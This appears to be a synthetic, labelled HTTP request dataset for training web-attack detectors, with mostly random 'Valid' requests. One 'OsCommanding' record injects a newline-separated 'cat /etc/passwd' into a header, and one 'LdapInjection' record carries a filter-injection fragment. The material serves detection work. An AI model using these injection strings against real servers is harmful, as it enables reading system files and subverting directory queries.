Pragma: no-cache
Proxy-Authorization: NTLM c2l3ZDVuc2VrN2VjYW5ldGx5aXpORXlFaHNvdmV0b2R0ZXNldTNza2Rzb2lkdQ==
Authorization: iegXa Zcs6=ruodl9ri
Range: 43-,164-
Referer: /s3nI/9Tb8ods/beatsnt/jeEd.cfm
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: slOs@J http://www.ssLxace.cz
UA-CPU: StrongARM
UA-Disp: 674,494,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7794x3946
Via: 8.1 190.160.48.95, neu/1.7 201.134.36.43:453
Transfer-Encoding: aei9u; 18ade7s=zlnjly
Upgrade: akoe/8.8, eee/8.5, nl0i/0.3, noNso/2.0
Warning: 811 www.lroqoi.shtml:7678 "achtda" "Thu, 03 May 07 03:52:45 UTC"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 23489
Start - Id: 6254
class: Valid
POST /e4PobuHzB5bV2@g/ASGihcTae/CEp.escriptvarEE/7emKaBEpLk/i7WT8YHu5djaF-Sgazai/nttnedz/ereche0ey/qdotpsiCtatPyElsn3/rsxrat4t6cgeoho9t/i-KDfOlFwf@9ojv/cRlc.html? HTTP/1.0
Content-Length: 56
Content-Language: R7tbUse
Content-Encoding: compress
Content-Location: /Ncipds/tpyu.mdb
Content-MD5: SGVleXJtdGhlZXJpYXI5NA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 18 Jul 05 22:32:18 GMT
Last-Modified: Sun, 14 Sep 08 07:48:28 CET
Host: www.marEtt.fr
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: n=eaj
Client-ip: 144.253.178.134
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="443"
Date: Mon, 17 Jan 05 09:49:43 UTC
ETag: "aDeQ-RKdFj@iSt8v"
Expect: snsy=1et0q
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Wed, 08 Jun 05 05:28:33 UTC
If-Unmodified-Since: Fri, 29 Feb 08 22:50:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 946
MIME-Version: 1.5
Pragma: Ti=7d8AmnpM
Proxy-Authorization: Digest qop=HktC
Authorization: indnle Afer=wtad
Range: 3-853722,-06527
Referer: http://dzbt9.org/eyho2u/nedneew/retni/eafeAt/drdLy.css
TE: deflate
Trailer: Proxy-Authorization
User-Agent: lNIJBeGEYv http://www.tocu0d6.st
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0276x3141
Via: 4.1 www.neteappi.html, 9.9 98.81.234.88, 9.6 www.rNpnc.css
Transfer-Encoding: compress
Upgrade: ra0Hnd/6.8, eyae/3.6, Irhtn/4.9, eltrm/8.5, ilhi/1.9
Warning: 293 89.114.170.104 "cpw6e0" 
X-Forwarded-For: 128.144.152.215
X-Serial-Number: 27219
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

swt=hsautoexeca&Esocutauewsay=69484002&Mcopymzzv-R=XZN g

End - Id: 6254
Start - Id: 28499
class: Valid
GET /ksse/lv9cOJhFTrkArc/760kQNlWSBtlykq@/q_Z7sg/ARdocumentIN-nodemail_all.g/tLDX_hfYltP/xei1radlnm2o.php? HTTP/1.1
Host: 32.195.202.126:72
Connection: hzlaec
Accept: audio/*;q=0.5, video/quicktime;q=0.4, text/xml;q=0.5
Accept-Charset: windows-1251
Accept-Encoding: identity;q=0.4, compress;q=0.4, identity;q=0.5, gzip;q=0.9, deflate
Accept-Language: n-nig;q=0.0, ecgwua-oeb9ix;q=0.4, 2ttrr-P;q=0.3, rtl1t-rdpei;q=0.8, jri-rexnn;q=0.6
Cache-Control: oyitire='t'
Client-ip: 229.55.227.78
Cookie: nq0ge=5675;gqteHutenTa=erooa1iteowloE
Cookie2: $Version="5"
Date: Thu, 09 Aug 07 13:23:05 CET
ETag: "Z4ieQM62r0xn@wHGd"
Expect: itudnu7K
From: rbaSl@tdcutcZ3sd.be
If-Modified-Since: Tue, 03 May 05 16:36:39 CET
If-Unmodified-Since: Sat, 18 Feb 06 04:07:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0117
MIME-Version: 1.9
Pragma: enahe='oricoe'
Proxy-Authorization: Basic ZmVhRG9vMXg6dG5ydGRjZW4=
Authorization: NTLM WGV3cXBtdUF6bWNPYm9sRWJneWJkZGFuaWNJZXNlaGVvYmlnaWFlbmZldA==
Range: 342905-6,364-
Referer: /Vtahohha.css
TE: gzip;q=0.5
Trailer: Connection
User-Agent: Mozilla/7.5 (compatible; 7hPru; Windows NT; rsmexSpecI)
UA-CPU: x86
UA-Disp: 8399,990,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: FTP/0.6 145.228.0.123, 8.0 100.226.16.167, 5.1 www.Ej7Oa.gif
Transfer-Encoding: identity
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 77486322
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28499
Start - Id: 24416
class: Valid
GET /OFenyeodtes2/hV6VeWV6Bc.4Zfi02tsU/cqsnceoed6OSrehrtsed/ooncanclbiottnwndent.jpeg?rri4l=dslti&pwei=zMshD.-n6&2bbl=4169362&iconwn4dfoeeoy=8583762&apnC1entx4Acve=814&bO48hsse=06566005&4-AN0EB1C0=g HTTP/1.0
Host: 153.52.242.134
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 143.96.218.124
Cookie: AlPler=trht9eiP;toesymo6RRiatns=4745819621
Cookie2: $Version="9"
Date: Wed, 06 Jan 10 03:26:32 CET
ETag: "8QR5GRodNXte7ZVRSAE"
Expect: 100-continue
From: EthrCsE2@rztsaatbaT.be
If-Modified-Since: Fri, 08 Aug 08 07:35:00 GMT
If-Unmodified-Since: Tue, 06 Apr 04 14:32:09 GMT
If-Match: "z7qGYAnPvn0kdCBsd"
If-None-Match: "aCa@-@uaG3MnjkqBUoLE"
If-Range: Thu, 31 Jul 08 01:26:41 GMT
Max-Forwards: 381
MIME-Version: 7.8
Pragma: frcrtr='metCtopc'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: pi6o tioeo=itUemme
Range: -68145,609727-
Referer: /0aaHcact/eyt1w/tyires/tldufio.tar.gz
TE: deflate;q=0.5,deflate
Trailer: Host
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 0.0; mt-q8; rv:3.8.6) Gecko/81522915
UA-CPU: StrongARM
UA-Disp: 801,8735,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1274x3966
Via: 3.7 113.64.167.236
Transfer-Encoding: identity
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 798 229.122.23.82 "ilnadesl9oe" 
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 568060558126
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24416
Start - Id: 43612
class: OsCommanding
POST /et.2ceYa8hSLfa1TnX./umRuWLu/rswG4Nq/exU43CK2SXFPkREytCz/tn/waRs/uPdx-mw.vVPSYdri/oiWefmfstvnheeaiu7/lq/pmrhh.shtml? HTTP/1.1
Content-Length: 22
Content-Language: gyum1s,sikStph,pd
Content-Encoding: gzip
Content-Location: /7wenhas.php4
Content-MD5: SWNucm95Y25pZWlpRXRwYw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Dec 04 16:10:01 CET
Last-Modified: Mon, 03 Dec 07 17:49:16 CET
Host: 204.82.129.77
Connection: ttldng
Accept: video/*;q=0.3, text/*;q=0.1, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: %0a   cat     %0a  /etc/passwd     %0a
Cache-Control: only-if-cached
Cookie: Esa=LAzlikegEnguwh94s;tedwiormiae5i=8426593;ta=jr;nieadu8einjyf=roE5rG.c;az=v9CMsiac
Cookie2: $Version="5"
Date: Wed, 18 May 05 08:49:44 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
If-Unmodified-Since: Mon, 25 May 09 04:33:45 CET
If-Match: "UURFP6n@KqKYjyBBR07"
If-None-Match: "Ba4uQ.ABs2DEcfZ"
If-Range: Mon, 28 Sep 09 08:29:47 UTC
Max-Forwards: 2
MIME-Version: 4.4
Authorization: NTLM bk1yZGVla2hoa3J2cGN5ZGxCZWVtVW1FZWFsemk2VGZsZ3JTYnVoYUw=
Range: 29587-,-5463,921-
Referer: /teo91r.gif
User-Agent: Mozilla/5.9 (X11; U; Open BSD i586 1.2; Wd-eh; rv:8.3.9) Gecko/75000048
UA-CPU: x86
UA-Pixels: 6552x5468
Via: 2.4 214.230.116.251, HTTP/4.1 152.112.100.223
Transfer-Encoding: compress
Warning: 514 www.evidcBoe.css:898 "hdt0o" "Fri, 09 Jun 06 07:45:03 GMT"
X-Forwarded-For: 1.73.97.53
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

3eec4ryegKvntI=r%eio

End - Id: 43612
Start - Id: 20893
class: Valid
GET /ildE2locationO/eE/i90i/ae/oTpC80vd/s@HJ.hcPKf/e3UEhGa8FB.php3?KsNaix2wa=rG86&eOnnef=GecpcooaSwbntA&0QQZ=h68ZNMhwLe2&eoctaAnj47avs=bWFs HTTP/1.1
Host: 37.233.37.89
Connection: aRoshsPs
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: auueaens-fohite, xe4Er-Ed, paei7-i3;q=0.0, ieds2sb-issatls, a2dNaorc-Anhwtch
Cache-Control: only-if-cached
Client-ip: 226.250.147.112
Cookie: ZOU3Qtmp=etpose;DaV-oFCA=917
Cookie2: $Version="928"
Date: Thu, 11 Feb 10 01:05:05 UTC
ETag: "1Bq-qkQgtVJspW-hek"
Expect: 100-continue
From: iStt7oha@lc2epd8.cz
If-Modified-Since: Sat, 12 Nov 05 07:51:08 UTC
If-Unmodified-Since: Mon, 05 Jan 09 01:29:57 GMT
If-Match: "S6BfwifqVHgmyWEqr"
If-None-Match: *
If-Range: Sun, 29 Apr 07 21:18:20 CET
Max-Forwards: 70
MIME-Version: 1.4
Pragma: hrm5=hpvt1t
Proxy-Authorization: Basic dGxodXNpYzp0b3VpZWg=
Authorization: raoi neste=eoNienig
Range: 822099-090,811-0
Referer: /hspxp/gGoel8/sNrzhtpn.php
TE: chunked;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 1.1; et-xA; rv:5.8.2) Gecko/22739043
UA-CPU: PowerPC
UA-Disp: 743,400,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2726x7026
Via: 1.2 www.edcitie.shtml, 2.6 www.mouerli.gif, 6.3 187.79.210.185:4236
Transfer-Encoding: identity
Upgrade: edtet/9.8, hrp/3.4, drxn/5.0
Warning: 869 18.197.245.223:73 "nRecvaotldeggbe9ehsO" "Mon, 04 Apr 05 17:24:23 CET"
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20893
Start - Id: 33083
class: Valid
POST /ta0eesnwsfrutmLt8/yd6a1T2rot/oAtqhhtsuwrHunaesb9/fuu.z8/iMDLk-FPQIpetz/yVufI2pEA1nySNTtPY/taehtLme8qolnnDm/iS4V.UM3bf/ymqu4ay8iaeaTe/@WVZ9eLc/elur.mspx? HTTP/1.1
Content-Length: 284
Content-Language: isuS,tvReetr,o
Content-Encoding: gzip
Content-Location: http://www.Oq8ed.gov/ne03glw/aamb/tetier/rrafes/oeeager.css
Content-MD5: dHJ4YXNEUnRyZTRyc2wwYw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Sep 04 22:04:31 CET
Last-Modified: Thu, 18 Nov 04 16:47:57 GMT
Host: www.listsa.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: reas-naesy0;q=0.7, aBaaIr-nbaonc;q=0.8, ni-BT;q=0.9, imcvrw-olirh;q=0.1
Cache-Control: min-fresh=617
Client-ip: 57.184.21.251
Cookie: 0yp=a;itcctawelhra=06;tuthtmrG=F~tv@/e;es1i=/savbscripts
Cookie2: $Version="0"
Date: Thu, 06 Dec 07 20:12:59 GMT
ETag: "U0DNn@kPPXuJZ8.p"
Expect: lsstoeA
From: 4a64appe@alsxipenr.biz
If-Modified-Since: Fri, 17 Dec 04 10:22:14 UTC
If-Unmodified-Since: Tue, 21 Nov 06 01:45:05 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 May 04 23:07:22 GMT
Max-Forwards: 852
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM UnJpbmVoenVuZXdjc2VpYVIzc2FvNXhyMWFhYW1uZnpuZXNtZW1lbWU=
Authorization: NTLM cnNOcndqYXNyY29vaHR1aUFpa25hdW9yOWxpNWhvZUZyaGF1MWVudHJhbg==
Range: 25-158969,392635-882565,41-
Referer: http://onhbe.gov/sehx/onot/aHaa.htm
TE: trailers
Trailer: TE
User-Agent: Mozilla/1.0 (compatible; MSIE 1.6; Win98; febrne5tS; oewFj1nq)
UA-CPU: 68000
UA-Disp: 287,078,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3560x1386
Via: 1.9 42.36.81.251:3, 5.4 220.20.41.116
Transfer-Encoding: rotuel; ieuoeo=zsydlcwa
Upgrade: httiri/1.3, 75a/6.7, ueeo/8.2
Warning: 039 18.32.213.153 "1himeenD6aarst" "Wed, 25 Aug 04 07:02:03 UTC"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1368641
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cIWQ21q=hdeeglzevil&bFO_=0547134&bIudoe80aceA=t&at2etaaanibgae=si&AiL5_rY=tZl&isi1enns=s4s26eqfrmleznuE&eNbl=259078&iE=1+a pereplaceepositioneachild&ilNt6r2oGdCjqi=pR.&yAni=fiosongwetwum5f2cI&x0tlorda=ohuabFetnneg&ensnitonwcna=z<LfN&nltT=08939671&hnxhs=78869&e4reyxorelve=t88mocha

End - Id: 33083
Start - Id: 17615
class: Valid
GET /uBbolsN6A-a6SJ/a5E2hakaCht6peeWra/ieGncrp/tlfaj-yTObDqAx/iZ.jsp?esLueil=06&Au1aaD5ro8e3=213&md=93&90tlyhsniue=1&rii=nTLQHx-WkQ&ceOirag2ile=eNDx7%40F&nIosaw9nefeys=ranrm6temcynTnTo&retyessrem=7ito&SsDr1=ti7cmbody9e2sR HTTP/1.1
Host: 117.248.230.120
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, euc-jp, koi8;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: ent-oot;q=0.2, lwarnha-uooi;q=0.9, a8a-qtfO;q=0.7, tioabv-AEtdnoh;q=0.1
Cache-Control: max-stale
Client-ip: 111.105.19.55
Cookie: jyon=9ilo3eIEumanoeyz;N.qt7P=oQPi;szucltc7e5= ;sai6ne=erZ.W;oRansnmeili=[>adminsb;WUxp_RHDcopync=8eeh
Cookie2: $Version="35"
Date: Thu, 02 Jun 05 01:34:42 GMT
ETag: W/"BkVFXafjeZNDem79"
Expect: 100-continue
From: croeol2e@tiEhh0b.de
If-Modified-Since: Sun, 01 May 05 23:52:02 GMT
If-Unmodified-Since: Wed, 03 Feb 10 05:11:12 GMT
If-Match: "vEDnAcbPGtc3Bdf"
If-None-Match: "UfIJ65L6XSwFip0"
If-Range: *
Max-Forwards: 491
MIME-Version: 8.1
Pragma: yuYrr='VehSe1ti'
Proxy-Authorization: Basic b2Zvb3lhbVQ6enZaeWlucA==
Authorization: Basic ZW5uczVpYTphbmphZ200
Range: -948
Referer: http://www.NfoSncsl.gov/eizjoiy/a60t8/NtdU.conf
TE: trailers,trailers,chunked
Trailer: Authorization
User-Agent: eaovlN
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 519x8664
Via: FTP/2.5 240.206.221.3, iihg/3.6 242.16.23.61:01799, HTTP/3.8 141.125.146.15
Transfer-Encoding: gzip
Upgrade: H4s/6.5, syax/8.8
Warning: 712 223.93.147.43 "mgu5s9ciwimaaiteyot" 
X-Forwarded-For: 68.35.229.1
X-Serial-Number: 607664307
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17615
Start - Id: 14902
class: Valid
GET /owImTall0HMxm/GR6wp-LF8eVfycw/rxeYoio/1UwT/aL8/0jqxJYH/ra7NmmMtperzaoT5Eeo/tgbm2nsAn/bfAMTq2qm8XOITE.asp?a5i=fPpB&ld7o5Ul=07179348&crokom=5EenesS4%3FHn%3Com&oareTh=eid&ns8wXnrho2e=86&wiY3GoniacCrl=4EgIAlr&tTjitowAee=p97slHxIs&xIEKjf97wgetDmocha=aos&allYphpBandknOCK=945751747&lzept6e=74046297&iZdaupmBaehtS1m=94916&iepsezataaEhsyi=804177465&cp=4nge%2Fn1objectl&dne=1147&nph-S_IGWOYPV=oeall HTTP/1.0
Host: 117.72.142.4
Connection: cbs1miri
Accept: video/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: a5-rkkhci, moaltaa-h2aebte;q=0.5, b3s23a-y;q=0.3, to2-eInnnn, f-phsn;q=0.3
Cache-Control: only-if-cached
Client-ip: 124.214.139.83
Cookie: ipaens=cYautoexec8\saee
Cookie2: $Version="962"
Date: Tue, 11 Apr 06 20:03:56 UTC
ETag: W/"tVjF2_Tn23vf0hpQ"
Expect: sT1i=7oiuslK;krpi
From: 09ujate@anp8ehmeue.biz
If-Modified-Since: Tue, 31 May 05 15:56:53 UTC
If-Unmodified-Since: Thu, 13 May 04 20:42:38 GMT
If-Match: "Dn35Gdd8v7iGqmGd"
If-None-Match: "7H4uxINNEbvWdQyQyF"
If-Range: Wed, 04 Jan 06 20:55:44 CET
Max-Forwards: 6552
MIME-Version: 0.2
Pragma: o=Emmokuoi
Proxy-Authorization: Basic aWVzYWc6NnhzNnlsb3M=
Authorization: 8arok qv5onc=oOsc
Range: -118093,96143-501,08465-1
Referer: http://www.nmclnrE.com/aosurwgo/ves7n0/cu2cr/rctenait.pdf
TE: gzip;q=0.2,gzip
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 3.6; kr-vo; rv:9.5.6) Gecko/89369580
UA-CPU: StrongARM
UA-Disp: 8593,9918,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6967x560
Via: HTTP/4.3 www.hndnpal.html, asuorA/6.1 www.fq5om.png, 6.0 6.76.59.248
Transfer-Encoding: gzip
Upgrade: ed3tT/7.9, 3Ifeie/2.1, etw/3.8, thenvr/4.1
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14902
Start - Id: 37606
class: LdapInjection
POST /snausS0C7drid6ilci.msf? HTTP/1.1
Content-Length: 227
Content-Language: klvr,wslaet,aea
Content-Encoding: compress
Content-Location: /ainrleh/rslSoos/eakN.fgf
Content-MD5: cFNsbDZob2V0bmx1a3RvRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 12 Mar 04 19:20:07 GMT
Last-Modified: Wed, 08 Mar 06 06:21:26 GMT
Host: 6.109.140.107:80
Connection: keep-alive
Accept: image/*, text/html;q=0.8
Accept-Charset: utf-7, windows-1250, x-mac-arabic, iso-2022-kr;q=0.6, windows-1254
Accept-Encoding: 
Accept-Language: t9-Om, nEtFeE-Ifjiog;q=0.1, 5fs73p-ekie;q=0.0, rhiYgsp-m;q=0.7
Cache-Control: no-transform
Client-ip: 197.120.120.97
Cookie: fusbve=riT Hda te;w84dm=627926;he=jFZoBC9;eiier4=aT13ku;atleut=cemt
Cookie2: $Version="1"
Date: Wed, 28 Jan 09 19:35:32 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: atOn8lmw=quhao
From: shqwscZ@htnl9xec.gov
If-Modified-Since: Tue, 28 Dec 04 13:04:04 UTC
If-Unmodified-Since: Mon, 25 Sep 06 16:51:15 CET
If-Match: "eoamW9NIVthebgN"
If-None-Match: *
If-Range: "bKzjmmSku3m81rjF"
Max-Forwards: 0120
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: NTLM Z2YxM2lmdHl0aG1udG1ydEF0cm9BV2U4aUF3cnJ0dzBJbmxlbW5ybjd0
Range: 5-,297-087
Referer: http://www.Afoh.org/mdea/a7etsce.nsf
TE: chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.4 (Windows; U; Win98 9.6; iI-tt; rv:3.5.9) Gecko/71189660
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/0.8 119.213.14.150, 1.5 www.eodt.html:0569
Transfer-Encoding: deflate
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 105.35.228.101
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

lsoaaEnbntc=79740988&tNqifi21ccd5p=065892&KrmLreplaceEBvarZBhttpsK=nHib)(| (s9i=*)&.Nfe=iiveesCprhecO&hsnyloteeyatd=h25mrueeyem&xIhomebXDR=8077438&gwpi7iyltjtj=9851070&eVYRDPS9ANiframe=tn5trs&ynlnnc=execE2ibt7 SE Zp

End - Id: 37606
Start - Id: 25339
class: Valid
GET /950PZwB2/eotrianeoe/nnh5tlraromienvss39.css?eermdGNo=r0eviezdcd&eco=tg&kdrd5bnereeii=%3F%5B&brvaann=htsi+iz&oh=plljc1iet9da4tuocg&Ryy0ohzsab6E=lbcmdrqM&9yw=2278371&o9el=4&ymamoyvt=ciayl5TOoo&0ifEx3Ek=nl4e4NYGIBP1&ttiesaDrupehbia=ns2eE&nsivTwe6qg0=wheajteU&dil7lptsafe=tl&i6ereprspalelnI=dtiichhll8zftrm7 HTTP/1.1
Host: 11.203.185.231
Connection: roeu6ctb
Accept: video/quicktime;q=0.3, image/*, video/mpeg;q=0.2
Accept-Charset: x-mac-cyrillic, windows-1252, x-mac-korean, euc-tw;q=0.3, windows-1253
Accept-Encoding: *
Accept-Language: adpte-TediI9eh;q=0.6, looErr-Q4mnklez, lae-NetZuS;q=0.4
Cache-Control: no-cache
Client-ip: 46.134.105.226
Cookie: haEdeletelzi=3;bimgLsBm9=2702540;inOht3elohng= ;ohae=ov9r3
Cookie2: $Version="5"
Date: Sun, 05 Nov 06 24:13:37 CET
ETag: "k0yDpisrt@FrTBjdjEE"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Sat, 24 Feb 07 13:34:26 CET
If-Match: "-eQfj_Gvn8DVW7INkqq"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.rn0rrh.it/uox5plt/dRe5wf1t/sEfn/doaoli7/aepASr.cfm
Authorization: Digest cnonce="ifohe"
Range: -5,9601-,-779
Referer: /Abnnnu.mdb
TE: deflate
Trailer: Connection
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 2.3; 81-hi; rv:8.9.3) Gecko/08506027
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: gzip
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25339
Start - Id: 12590
class: Valid
GET /egAH/uw5uC1NFq/TyviSe/rbnerf.css?eEfIexec8o8Dg-=69157207&cMdlIx=linkb%7E9&7snixtnin=042701915&EizPLgTQs9j=atteoety&momndsrmahi=w%2FmuAr9 HTTP/1.1
Host: 233.19.77.254
Connection: nleok
Accept: audio/*;q=0.8, image/*;q=0.2
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 29.95.130.117
Cookie: n4acdeaat2dui=966716307;3rgiiomhm=fieA5ts)f\;ifiyoonxs=95238;oieL5hioAjiYD4=ahreifeoFsC
Cookie2: $Version="5"
Date: Mon, 30 Jan 06 22:11:02 GMT
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: Hsttkg@positcooU.be
If-Modified-Since: Sat, 18 Mar 06 12:41:48 UTC
If-Unmodified-Since: Thu, 01 Feb 07 05:36:47 GMT
If-Match: *
If-None-Match: "hJTIwMWAzcCgExrV-"
If-Range: "qU9sXDK_qRSyn7.tFps"
Max-Forwards: 471
MIME-Version: 4.9
Pragma: yiyMaohV=6
Proxy-Authorization: ohlend 5tstwcsv=aehbgNa
Authorization: Basic dnM4YWh1Om5lMnRw
Range: 132-,3231-699
Referer: /cotilmd/ohaqma/438rln/Si7eerOh.msf
TE: chunked;q=0.1,chunked;q=0.2,trailers
Trailer: Accept-Language
User-Agent: leIEhoh5onharenaeai
UA-CPU: StrongARM
UA-Disp: 3658,3398,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 280x609
Via: FTP/2.8 232.141.212.118, eptha/3.6 www.srap.jpeg
Transfer-Encoding: egntro; cpgtlB=a7il
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3472507595174879
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12590
Start - Id: 29622
class: Valid
GET /ihtG-_O6H3/6GLi6oDpv/n@Lz5b5DZLDOZ1HF/ylMd/faibNngtasOisATai/merRBqPk/tvSW4lUYoqG_O/ha1nolfooetro/d3.D12t/nAbv@oD.cgi?hx=hyr85sroaorerotdP HTTP/1.1
Host: www.bljknelic.st:526
Connection: ogr8o
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.9
Accept-Encoding: identity;q=0.8
Accept-Language: dast-t2, 2ctHns9I-arnOs;q=0.7, bet4hmk9-aobt, niieNj36-emleud, z-me;q=0.5
Cache-Control: max-age=37049
Client-ip: 220.103.73.34
Cookie: hceGwearas=2609962091;ne=yvspemslftbic
Cookie2: $Version="82"
Date: Fri, 30 Jul 04 22:02:55 GMT
ETag: W/"DcQG5O.7EpDFOO@c4"
Expect: edmab
From: nolsht@blet57iahr.net
If-Modified-Since: Mon, 01 Sep 08 20:05:36 UTC
If-Unmodified-Since: Thu, 06 Mar 08 05:29:07 GMT
If-Match: "V9zGGtSpP3jw@pM"
If-None-Match: *
If-Range: *
Max-Forwards: 358
MIME-Version: 1.3
Pragma: Uh=nub
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: eaun6 2tdhtEo=ehcr
Range: -566,8-27551
Referer: http://www.Ie9Cb.fr/adge/groi.jsp
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: mhhganx7tn
UA-CPU: MIPS
UA-Disp: 282,356,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5641x077
Via: FTP/1.1 www.dinul2f.html
Transfer-Encoding: deflate
Upgrade: tdet/1.8, gtr/7.8, l8sivs/5.8, aedub/5.6, a2nlas/3.5
Warning: 312 12.87.124.248 "aefoossHowseHyti0tck" "Sun, 13 Feb 05 01:23:27 GMT"
X-Forwarded-For: 162.168.91.9
X-Serial-Number: 41855
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29622
Start - Id: 28515
class: Valid
GET /wsUNTEMOmmzl2z-S/a2/dmthesheiykrdrinhs2s.cfm?nnatrrmtonE=i+php&hd6aa8t4rzrs=eb0eNnuGn6a&mDsc9sToogb=epxo&mymul=dus%5D%3Dhdwsn%3E+&QNN4iDnWexecDJ=at%3Fscript%7E HTTP/1.0
Host: 162.111.0.13
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.5, identity
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 0.102.184.162
Cookie: eaka8q=852966183;EziUnbh=omoheazw4esegegh;f3hhuk=voen>hp3i:ecmd;lfpaumi=uage75;eedbXnoacSg7sdG=228;replaceKUMjY8=s uyhnhFns)andiA
Cookie2: $Version="66"
Date: Thu, 30 Jun 05 10:37:51 UTC
ETag: W/"56y2QcstYYp.E36"
Expect: 100-continue
From: Hiedyo@ds6eekiny.org
